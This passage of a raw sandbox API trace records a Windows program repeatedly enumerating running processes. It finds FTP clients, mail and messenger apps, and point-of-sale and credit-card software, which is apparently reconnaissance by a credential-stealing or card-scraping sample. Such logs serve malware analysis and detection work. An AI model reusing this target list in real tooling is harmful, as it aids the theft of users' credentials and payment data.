th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0248.726] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0248.739] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0248.742] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0248.744] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0248.751] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0248.753] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0248.754] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0248.756] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0248.778] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0248.781] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0248.782] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0248.784] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0248.786] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0248.787] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0248.789] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0248.791] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0248.835] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0248.843] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0248.845] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0248.847] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0248.848] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0248.850] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0248.851] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0248.853] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0248.886] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0248.888] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0248.897] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0248.899] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0248.901] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0248.903] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0248.906] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0248.908] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0248.911] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0248.913] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0248.914] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0248.916] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0248.920] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0248.921] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0248.923] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0248.924] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0248.926] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0248.927] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0248.929] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0248.930] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0248.936] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0248.937] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0248.939] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0248.940] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0248.941] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0248.943] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0248.944] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0248.946] CloseHandle (hObject=0x1018) returned 1 [0248.946] Sleep (dwMilliseconds=0x64) [0249.058] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0249.070] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0249.072] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0249.075] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0249.077] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.078] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0249.080] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0249.081] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0249.083] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0249.084] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0249.085] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.087] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.091] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0249.092] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.094] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.095] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.096] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.098] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.099] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.101] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.102] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0249.104] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0249.155] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0249.156] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.158] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0249.159] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0249.161] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0249.162] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0249.164] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0249.165] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0249.167] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0249.170] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0249.171] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0249.173] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, 